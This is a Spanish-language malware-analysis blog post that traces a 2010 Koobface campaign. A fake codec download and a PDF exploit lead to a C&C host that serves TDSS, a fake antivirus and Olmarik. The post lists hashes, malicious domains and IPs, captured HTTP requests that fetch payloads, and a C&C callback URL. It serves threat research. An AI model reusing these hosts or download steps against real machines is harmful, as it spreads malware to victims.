MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

25.7.10

Circuito de Koobface desde 91.188.59.10 (BKCNET "SIA" IZZI)

Luego de varios meses sin tener novedades de Koobface, por lo menos sobre su propagación típica empleando como cobertura de ataque la clásica pantalla falsa de YouTube, vuelve con otra campaña de propagación.

En esta oportunidad, su diseminación sigue siendo a través de ingeniería social visual pero no bajo el template del supuesto video de YouTube sino que utiliza una página con contenido pornográfico.


Como se aprecia en la captura, cuando se intenta acceder a alguno de los supuestos videos, una pequeña ventana advierte sobre la necesidad de la descarga de un codec. Al aceptar, se descarga Koobface bajo la cobertura de un binario llamado codec.exe (5910e59d592781cec3234abf57f8d000), desde la dirección IP 91.188.59.10 que resuelve el dominio 1zabslwvn538n4i5tcjl.com. Esta IP es utilizada para la propagación de Koobface desde marzo de 2010.

Además, la página contiene embebido un script que redirecciona el tráfico hacia la descarga de un archivo PDF que contiene un exploit para CVE-2008-2992.


También en la misma IP pero que deja en evidencia que su gestión se esta realizando a través de un conocido crimeware: YES Exploit System.


El binario ejecutable codec.exe se encuentra empaquetado con UPX (UPX 0.89.6 - 1.02 / 1.05 - 1.22 -> Markus & Lazlo). Cuando se activa genera un BAT (se autoelimina) con instrucciones al C&C, estableciendo conexión contra 1zabslwvn538n4i5tcjl.com desde donde descarga los siguientes códigos maliciosos:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

El BAT contiene la siguiente instrucción de conexión y envió de información al C&C:

http://urodinam.net/33t.php?stime=1280078675

Este dominio se encuentra en la misma dirección IP 91.188.59.10 con instrucciones para la descarga de otro malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

Se trata de una copia del rogue Security essentials 2010. Se conecta a getexepizdec.com (91.188.59.211) desde donde descarga el archivo firewall.dll (a0160e8ede623b1df7d677b8d52fdc48) y getmsdfgee54.com (88.80.4.19) desde donde descarga exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik) con una muy baja tasa detección.

Resumiendo, el circuito que recorre koobface desde BKCNET "SIA" IZZI involucra diferentes piezas del ámbito delictivo que se encuentran interrelacionadas entre si con el mismo objetivo: $$$$$ (retroalimentar la economía clandestina); dejando a su paso un verdadero portfolio de malware.

Bajo 91.188.59.10 es gestionado por un conocido crimeware cuyo costo en el mercado underground ronda los $1000 y al ser ejecutado se encarga de apuntar la descarga de otros códigos maliciosos a la computadora victima, gestionados bajo la coordinación de afiliados de negocio que incrementan sus ganancias por cada instalación exitosa del rogue.

Información relacionada
Simbiosis del malware actual. Koobface
Campaña de propagación de Koobface a través de Blogspot
YES Exploit System como Crimeware-as-a-Service
YES Exploit System. Otro crimeware made in Rusia

1 comentarios:

Panaceite dijo...

Despues de algo mas de un año asomandome a este blog, agradezco la información que facilitas y me doy cuenta de lo vulnerables que somos ante estas amenazas.
Realmente no podemos bajar la guardia ni un minuto.
Un saludo.